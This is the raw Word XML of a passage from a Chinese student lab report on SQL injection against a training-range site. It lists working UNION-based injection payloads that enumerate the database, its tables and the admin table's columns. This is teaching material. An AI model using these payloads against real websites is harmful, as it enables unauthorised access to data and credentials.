              <w:t>http://gognj2dm.aqlab.cn/index.php?id=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE5C8CC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD12EB6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60FA1990">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9C1D9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA86FF7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDDD80D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>最后总结如何对SQL注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A58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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E894984">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>三、实验设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D11DD9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 实验核心原理（SQL 注入漏洞成因）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569FD3D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SQL（结构化查询语言）是用于操作数据库数据的标准语言，网页应用在与后台数据库交互时通常会拼接 SQL 语句。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30DF2CA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SQL 注入的本质是应用程序对用户输入的数据（如 Web 页面的原 URL、表单域或数据包输入的参数、Cookie 等）没有进行严格的过滤或验证。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A430C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攻击者可以将恶意的 SQL 代码修改并拼接到正常的输入参数中，传递给 Web 服务器，进而传给数据库服务器执行。这会导致原本的 SQL 语句逻辑被改变，从而发生 SQL 注入攻击，造成数据泄露、数据篡改或权限提升。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567C154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常见注入方法分类</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555D5DD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根据输入参数类型的不同，通常可分为以下几种基本注入方法： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F64E7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基于字符串的注入： 攻击者通过插入特殊的字符（如单引号 '）来提前闭合正常的字符串，并拼凑恶意 SQL 代码。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E8469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数字型注入： 在数字类型的输入字段中插入特殊的数值或逻辑运算符，改变 SQL 查询语义。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63F81EE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布尔型注入： 利用插入特殊逻辑表达式后应用程序返回的不同响应结果（真或假），来推断数据库信息的盲注方式。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="122130B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实验攻击路径与步骤设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8821F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本实验针对特定的目标靶场（[http://pu2lh35s.ia.aqlab.cn/](http://pu2lh35s.ia.aqlab.cn/)），设计了以下由浅入深的攻击步骤： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFA097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第一步：识别与验证注入点。 通过在 URL 的 id 参数后附加逻辑条件（如 and 1=2）或闭合符号，观察页面响应的变化，确认该参数是否被直接拼接到后台 SQL 语句中执行。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67275F3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第二步：探查后端查询结构。 注入点确认后，利用 ORDER BY 子句进行排序测试，通过不断递增数字直到页面报错，以此探测出后台原始 SQL 查询所包含的字段数量。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2A4978">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A243FC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第三步：定位前端回显点。 运用 UNION SELECT 联合查询，并配合恒假条件（如 and 1=2），找出能够将数据库查询结果打印在前端 Web 页面上的具体字段位置。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2787FEE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第四步：逐级提取数据库结构。 利用确定的回显点，结合 MySQL 内置的 information_schema 系统库，依次暴露出当前数据库名称、数据库内的所有表名（如 admin 表）以及表内的字段名（如 username、password）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D64F2E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">第五步：获取核心敏感数据。 根据暴出来的表名和字段名，直接构造查询语句，提取最终的管理员账号和密码凭证。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA865DC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52CE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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="233546CA">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>四、实验过程或算法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC5362F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>一</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>步：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>准备工作与判断注入点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB564B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确认目标网站是否存在 SQL 注入漏洞，并找到程序的突破口。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F120E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访问目标网站： 打开浏览器，访问提供的靶场链接 http://gognj2dm.aqlab.cn/index.php?id=1。  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F55624A">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841625" cy="1666240"/>
                  <wp:effectExtent l="0" t="0" r="317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841625" cy="1666240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC4DB0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符号闭合测试： 在 URL 参数后分别尝试加入单引号 ' 和双引号 "。如果页面没有正常返回内容或出现报错，说明后端未对引号进行有效处理，存在 SQL 注入的可能性 。  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F250F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931795" cy="1715770"/>
                  <wp:effectExtent l="0" t="0" r="1905"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
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2931795" cy="1715770"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="2983865" cy="1741805"/>
                  <wp:effectExtent l="0" t="0" r="635"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8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2983865" cy="1741805"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3773982A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DE97B7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逻辑执行测试： 将 URL 修改为 ?id=1 and 1=2（构造恒假条件）。如果页面内容消失或报错，说明我们传入的参数被服务器当做了 SQL 代码执行，确认存在注入点 。  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C99E9D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976880" cy="1735455"/>
                  <wp:effectExtent l="0" t="0" r="762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2976880" cy="1735455"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3735C751">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DF667CC">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第二步：判断原始查询的字段数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C08B8B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联合查询（UNION）要求前后两个 SELECT 语句的字段数量必须一致，因此我们需要先探测原查询到底有几个字段。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA1539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使用 ORDER BY 探测： 通过 ORDER BY 语句对特定字段进行排序测试 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C7C084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逐一递增测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316318D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输入 ?id=1 order by 1，页面正常回显 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715FE73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987040" cy="1767205"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1079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2987040" cy="1767205"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="612A335C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2287FC6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输入 ?id=1 order by 1,2，页面正常回显 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB4464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020060" cy="1774190"/>
                  <wp:effectExtent l="0" t="0" r="254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3020060" cy="1774190"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="624E481F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B7FC94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输入 ?id=1 order by 1,2,3，页面返回内容报错 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC0D18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981960" cy="1755140"/>
                  <wp:effectExtent l="0" t="0" r="254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2981960" cy="1755140"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7777953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得出结论： 因为到 3 时报错，可以推断出该 SQL 查询语句最多支持 2 个字段 。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408FF291">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="325D06B7">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第三步：确定页面回显点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4388404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这一步是为了找出这 2 个字段中，哪一个字段的数据会被打印在前端网页上，以便我们把想偷取的数据放在这个位置显示出来。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED5485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构造联合查询： 使用 UNION SELECT 合并结果集。为了让联合查询的结果显示出来，需要将前面的条件置假（如 and 1=2 或 and 0=1），这样页面就会只显示我们后面 SELECT 的内容 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11050C7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执行测试： 输入 ?id=1 and 1=2 union select 1,2 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0475884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105785" cy="1819910"/>
                  <wp:effectExtent l="0" t="0" r="571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3105785" cy="1819910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3234B2F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观察回显： 如果网页上原本显示文章内容的地方出现了数字 “2”，说明第 2 个位置就是回显点，我们可以利用它来输出数据库信息 。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3657148F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33D7007F">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第四步：获取当前数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7793F1A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利用回显点，调用数据库自带的函数来获取当前所在数据库的名字。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3953A69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执行查询： 将参数修改为 ?id=1 and 1=2 union select 1,database() 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3216530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122295" cy="1825625"/>
                  <wp:effectExtent l="0" t="0" r="1905"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a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3122295" cy="1825625"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C05795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记录结果： 观察页面回显，获取到当前数据库的名称为 maoshe </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8E88BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26FAD091">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第五步：获取数据库中的所有表名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39369F9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我们需要从 MySQL 自带的系统库（information_schema）中提取 maoshe 数据库下的所有表。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C69AE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构造查询语句： 表名存放在 information_schema.tables 中。注入语句：?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='maoshe' 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A3682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198495" cy="1872615"/>
                  <wp:effectExtent l="0" t="0" r="1905"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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3198495" cy="1872615"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="56476780">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="316D138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使用 LIMIT 遍历： 数据库中通常有多个表，直接查询可能只显示第一个。需要配合 limit x,1 子句（x 代表偏移量，从 0 开始）逐个读取 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE4B98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limit 0,1 -&gt; admin </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAF509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同上图。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C9647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limit 1,1 -&gt; dirs </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A49898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434715" cy="1997075"/>
                  <wp:effectExtent l="0" t="0" r="698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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3434715" cy="1997075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C89F3E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limit 2,1 -&gt; news </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6087E83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265170" cy="1896110"/>
                  <wp:effectExtent l="0" t="0" r="1143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stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3265170" cy="1896110"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AE2AC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limit 3,1 -&gt; xss </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239945C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140710" cy="1823085"/>
                  <wp:effectExtent l="0" t="0" r="8890"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8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3140710" cy="1823085"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="458BF3B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记录结果： 确认该数据库共包含 4 张表：admin、dirs、news、xss 。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E239214">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1535BB7D">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第六步：获取目标表中的字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6462D60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我们要找的是管理员密码，显然目标锁定在 admin 表。接下来查询这个表里有哪些列（字段）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C29A1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构造查询语句： 列名存放在 information_schema.columns 中 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D90A63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执行查询（GROUP_CONCAT拼接）： 为了绕过逐个遍历的麻烦，可以直接使用 group_concat() 函数将所有字段拼接成一行输出。输入：?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin' 。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9AC39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319145" cy="1927860"/>
                  <wp:effectExtent l="0" t="0" r="8255"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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3319145" cy="1927860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE0C3B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记录结果： 获取到 admin 表包含三个字段：id、username、password </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153FFC58">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
